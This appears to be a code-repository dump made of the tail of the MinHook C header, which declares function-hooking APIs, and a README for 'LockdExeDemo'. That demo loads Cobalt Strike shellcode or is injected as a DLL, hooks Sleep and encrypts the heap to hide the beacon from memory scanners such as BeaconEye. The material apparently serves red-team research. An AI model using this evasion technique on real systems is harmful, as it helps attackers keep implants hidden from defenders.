 32 |     #error MinHook supports only x86 and x64 systems.
 33 | #endif
 34 | 
 35 | #include <windows.h>
 36 | 
 37 | // MinHook Error Codes.
 38 | typedef enum MH_STATUS
 39 | {
 40 |     // Unknown error. Should not be returned.
 41 |     MH_UNKNOWN = -1,
 42 | 
 43 |     // Successful.
 44 |     MH_OK = 0,
 45 | 
 46 |     // MinHook is already initialized.
 47 |     MH_ERROR_ALREADY_INITIALIZED,
 48 | 
 49 |     // MinHook is not initialized yet, or already uninitialized.
 50 |     MH_ERROR_NOT_INITIALIZED,
 51 | 
 52 |     // The hook for the specified target function is already created.
 53 |     MH_ERROR_ALREADY_CREATED,
 54 | 
 55 |     // The hook for the specified target function is not created yet.
 56 |     MH_ERROR_NOT_CREATED,
 57 | 
 58 |     // The hook for the specified target function is already enabled.
 59 |     MH_ERROR_ENABLED,
 60 | 
 61 |     // The hook for the specified target function is not enabled yet, or already
 62 |     // disabled.
 63 |     MH_ERROR_DISABLED,
 64 | 
 65 |     // The specified pointer is invalid. It points the address of non-allocated
 66 |     // and/or non-executable region.
 67 |     MH_ERROR_NOT_EXECUTABLE,
 68 | 
 69 |     // The specified target function cannot be hooked.
 70 |     MH_ERROR_UNSUPPORTED_FUNCTION,
 71 | 
 72 |     // Failed to allocate memory.
 73 |     MH_ERROR_MEMORY_ALLOC,
 74 | 
 75 |     // Failed to change the memory protection.
 76 |     MH_ERROR_MEMORY_PROTECT,
 77 | 
 78 |     // The specified module is not loaded.
 79 |     MH_ERROR_MODULE_NOT_FOUND,
 80 | 
 81 |     // The specified function is not found.
 82 |     MH_ERROR_FUNCTION_NOT_FOUND
 83 | }
 84 | MH_STATUS;
 85 | 
 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook,
 87 | // MH_QueueEnableHook or MH_QueueDisableHook.
 88 | #define MH_ALL_HOOKS NULL
 89 | 
 90 | #ifdef __cplusplus
 91 | extern "C" {
 92 | #endif
 93 | 
 94 |     // Initialize the MinHook library. You must call this function EXACTLY ONCE
 95 |     // at the beginning of your program.
 96 |     MH_STATUS WINAPI MH_Initialize(VOID);
 97 | 
 98 |     // Uninitialize the MinHook library. You must call this function EXACTLY
 99 |     // ONCE at the end of your program.
100 |     MH_STATUS WINAPI MH_Uninitialize(VOID);
101 | 
102 |     // Creates a Hook for the specified target function, in disabled state.
103 |     // Parameters:
104 |     //   pTarget    [in]  A pointer to the target function, which will be
105 |     //                    overridden by the detour function.
106 |     //   pDetour    [in]  A pointer to the detour function, which will override
107 |     //                    the target function.
108 |     //   ppOriginal [out] A pointer to the trampoline function, which will be
109 |     //                    used to call the original target function.
110 |     //                    This parameter can be NULL.
111 |     MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal);
112 | 
113 |     // Creates a Hook for the specified API function, in disabled state.
114 |     // Parameters:
115 |     //   pszModule  [in]  A pointer to the loaded module name which contains the
116 |     //                    target function.
117 |     //   pszTarget  [in]  A pointer to the target function name, which will be
118 |     //                    overridden by the detour function.
119 |     //   pDetour    [in]  A pointer to the detour function, which will override
120 |     //                    the target function.
121 |     //   ppOriginal [out] A pointer to the trampoline function, which will be
122 |     //                    used to call the original target function.
123 |     //                    This parameter can be NULL.
124 |     MH_STATUS WINAPI MH_CreateHookApi(
125 |         LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal);
126 | 
127 |     // Creates a Hook for the specified API function, in disabled state.
128 |     // Parameters:
129 |     //   pszModule  [in]  A pointer to the loaded module name which contains the
130 |     //                    target function.
131 |     //   pszTarget  [in]  A pointer to the target function name, which will be
132 |     //                    overridden by the detour function.
133 |     //   pDetour    [in]  A pointer to the detour function, which will override
134 |     //                    the target function.
135 |     //   ppOriginal [out] A pointer to the trampoline function, which will be
136 |     //                    used to call the original target function.
137 |     //                    This parameter can be NULL.
138 |     //   ppTarget   [out] A pointer to the target function, which will be used
139 |     //                    with other functions.
140 |     //                    This parameter can be NULL.
141 |     MH_STATUS WINAPI MH_CreateHookApiEx(
142 |         LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget);
143 | 
144 |     // Removes an already created hook.
145 |     // Parameters:
146 |     //   pTarget [in] A pointer to the target function.
147 |     MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget);
148 | 
149 |     // Enables an already created hook.
150 |     // Parameters:
151 |     //   pTarget [in] A pointer to the target function.
152 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
153 |     //                enabled in one go.
154 |     MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget);
155 | 
156 |     // Disables an already created hook.
157 |     // Parameters:
158 |     //   pTarget [in] A pointer to the target function.
159 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
160 |     //                disabled in one go.
161 |     MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget);
162 | 
163 |     // Queues to enable an already created hook.
164 |     // Parameters:
165 |     //   pTarget [in] A pointer to the target function.
166 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
167 |     //                queued to be enabled.
168 |     MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget);
169 | 
170 |     // Queues to disable an already created hook.
171 |     // Parameters:
172 |     //   pTarget [in] A pointer to the target function.
173 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
174 |     //                queued to be disabled.
175 |     MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget);
176 | 
177 |     // Applies all queued changes in one go.
178 |     MH_STATUS WINAPI MH_ApplyQueued(VOID);
179 | 
180 |     // Translates the MH_STATUS to its name as a string.
181 |     const char * WINAPI MH_StatusToString(MH_STATUS status);
182 | 
183 | #ifdef __cplusplus
184 | }
185 | #endif
186 | 
187 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # LockdExeDemo
 2 | A demo of the relevant blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/)
 3 | 
 4 | 
 5 | ## DEMO
 6 | ![DEMO](ExeDemo.gif)
 7 | 
 8 | ### Explanation
 9 | There are 2 compile types.
10 | 
11 | The first is an EXE.  The EXE requires some sort of shellcode (I used staged cobalt strike shellcode from the payload generator).  You can validate this works by running your shellcode and using [BeaconEye](https://github.com/CCob/BeaconEye).
12 | 
13 | The second compile type is a DLL that you can inject into anything, will hook sleep, and same deal as the exe, any sleep over 1 will encrypt the heap on sleep.  Cobalt Strike's EXE by default makes 2 threads for some reason that both need to function that interferes with this whereas injecting a Cobalt Strike thread into another process does not (as now it only needs 1 thread to operate again).  To get this to work in a standalone generated CS exe that's already running may take a bit more work or a profile change.
14 | 
15 | Remember, this will work in processes like explorer.exe but it'll freeze the whole process as CS is sleeping and encrypting.  Really this version is meant for standalone processes you control.


--------------------------------------------------------------------------------